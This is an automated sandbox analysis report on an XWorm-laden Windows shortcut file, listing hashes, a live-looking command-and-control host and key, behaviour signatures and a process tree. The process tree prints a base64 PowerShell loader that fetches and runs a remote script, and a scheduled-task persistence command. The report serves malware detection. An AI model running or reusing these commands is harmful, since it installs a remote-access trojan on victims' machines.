Analysis
-
max time kernel
148s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240730-en -
resource tags
arch:x64arch:x86image:win10v2004-20240730-enlocale:en-usos:windows10-2004-x64system -
submitted
31-07-2024 07:41
Static task
static1
Behavioral task
behavioral1
Sample
nTalu.lnk
Resource
win7-20240705-en
General
-
Target
nTalu.lnk
-
Size
2KB
-
MD5
79b6a1c72f61bf2358eca72f4d67b4d7
-
SHA1
22c3540ce90d11b32b0a9c2eae94ae467af2aabf
-
SHA256
ee3dad6434cb64d091d15fda5900d088f46b64d0603a449d6bd46afb9705140a
-
SHA512
839fb585a20812324f4058cb2e354be77b243c212fcf35e1c16fb2668a266cbeb784844512e0aa15e6077cf2570e88b04bb986164f4972e1bc63a61576967d6e
Malware Config
Extracted
xworm
5.0
lisa22194141.duckdns.org:7000
2tuao2989c3EVwzo
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/3108-33-0x0000000000400000-0x0000000000410000-memory.dmp family_xworm -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 2 2812 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2077438316-259605770-1264560426-1000\Control Panel\International\Geo\Nation cmd.exe -
Executes dropped EXE 2 IoCs
Processes:
XovwDNpiRZKtFFANLO.exesvchost.exepid process 928 XovwDNpiRZKtFFANLO.exe 2172 svchost.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
XovwDNpiRZKtFFANLO.exedescription pid process target process PID 928 set thread context of 3108 928 XovwDNpiRZKtFFANLO.exe RegAsm.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
cmd.execmd.exeschtasks.execmd.exesvchost.exeXovwDNpiRZKtFFANLO.exeRegAsm.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language XovwDNpiRZKtFFANLO.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
RegAsm.exepid process 3108 RegAsm.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exeRegAsm.exepid process 2812 powershell.exe 2812 powershell.exe 3108 RegAsm.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exeRegAsm.exedescription pid process Token: SeDebugPrivilege 2812 powershell.exe Token: SeDebugPrivilege 3108 RegAsm.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
RegAsm.exepid process 3108 RegAsm.exe -
Suspicious use of WriteProcessMemory 25 IoCs
Processes:
cmd.exepowershell.exeXovwDNpiRZKtFFANLO.execmd.exedescription pid process target process PID 4332 wrote to memory of 2812 4332 cmd.exe powershell.exe PID 4332 wrote to memory of 2812 4332 cmd.exe powershell.exe PID 2812 wrote to memory of 928 2812 powershell.exe XovwDNpiRZKtFFANLO.exe PID 2812 wrote to memory of 928 2812 powershell.exe XovwDNpiRZKtFFANLO.exe PID 2812 wrote to memory of 928 2812 powershell.exe XovwDNpiRZKtFFANLO.exe PID 928 wrote to memory of 3108 928 XovwDNpiRZKtFFANLO.exe RegAsm.exe PID 928 wrote to memory of 3108 928 XovwDNpiRZKtFFANLO.exe RegAsm.exe PID 928 wrote to memory of 3108 928 XovwDNpiRZKtFFANLO.exe RegAsm.exe PID 928 wrote to memory of 3108 928 XovwDNpiRZKtFFANLO.exe RegAsm.exe PID 928 wrote to memory of 3108 928 XovwDNpiRZKtFFANLO.exe RegAsm.exe PID 928 wrote to memory of 3108 928 XovwDNpiRZKtFFANLO.exe RegAsm.exe PID 928 wrote to memory of 3108 928 XovwDNpiRZKtFFANLO.exe RegAsm.exe PID 928 wrote to memory of 3108 928 XovwDNpiRZKtFFANLO.exe RegAsm.exe PID 928 wrote to memory of 1216 928 XovwDNpiRZKtFFANLO.exe cmd.exe PID 928 wrote to memory of 1216 928 XovwDNpiRZKtFFANLO.exe cmd.exe PID 928 wrote to memory of 1216 928 XovwDNpiRZKtFFANLO.exe cmd.exe PID 928 wrote to memory of 3212 928 XovwDNpiRZKtFFANLO.exe cmd.exe PID 928 wrote to memory of 3212 928 XovwDNpiRZKtFFANLO.exe cmd.exe PID 928 wrote to memory of 3212 928 XovwDNpiRZKtFFANLO.exe cmd.exe PID 3212 wrote to memory of 2932 3212 cmd.exe schtasks.exe PID 3212 wrote to memory of 2932 3212 cmd.exe schtasks.exe PID 3212 wrote to memory of 2932 3212 cmd.exe schtasks.exe PID 928 wrote to memory of 4832 928 XovwDNpiRZKtFFANLO.exe cmd.exe PID 928 wrote to memory of 4832 928 XovwDNpiRZKtFFANLO.exe cmd.exe PID 928 wrote to memory of 4832 928 XovwDNpiRZKtFFANLO.exe cmd.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\nTalu.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4332 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -W h -e JAB4AGMAZQAgAD0AIAAnAHgAJwA7ACAASQBlAHgAKABJAHIAbQAgAGgAdAB0AHAAcwA6AC8ALwAwAHgAMAAuAHMAdAAvAFgAZgBJAFQALgB0AHgAdAApADsAIAAkAHgAYwBlACAAPQAgACcAeAAnAA==2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2812 -
C:\Users\Admin\AppData\Roaming\XovwDNpiRZKtFFANLO.exe"C:\Users\Admin\AppData\Roaming\XovwDNpiRZKtFFANLO.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:928 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3108
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C mkdir "C:\Users\Admin\AppData\Roaming\svchost"4⤵
- System Location Discovery: System Language Discovery
PID:1216
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\svchost\svchost.exe'" /f4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3212 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\svchost\svchost.exe'" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2932
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C copy "C:\Users\Admin\AppData\Roaming\XovwDNpiRZKtFFANLO.exe" "C:\Users\Admin\AppData\Roaming\svchost\svchost.exe"4⤵
- System Location Discovery: System Language Discovery
PID:4832
-
-
-
-
C:\Users\Admin\AppData\Roaming\svchost\svchost.exeC:\Users\Admin\AppData\Roaming\svchost\svchost.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2172
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
21.0MB
MD57d65fe5871d783fdd6c912675a2807cb
SHA12f2c294c04d7bdf7953562d263c68305695126ad
SHA256c4854be24acd139e4f4658246b362e12913b57bf4ff6a85c3c295ea08ac5a33c
SHA512167e9cd7258dcaf66d2f716e8f16a4a78b50faff08863ad4bbe4fc1d57b45b814677b60b74346c7d56edbabb0544dbfb9d27770f1bf0a6335a18cec0563d774c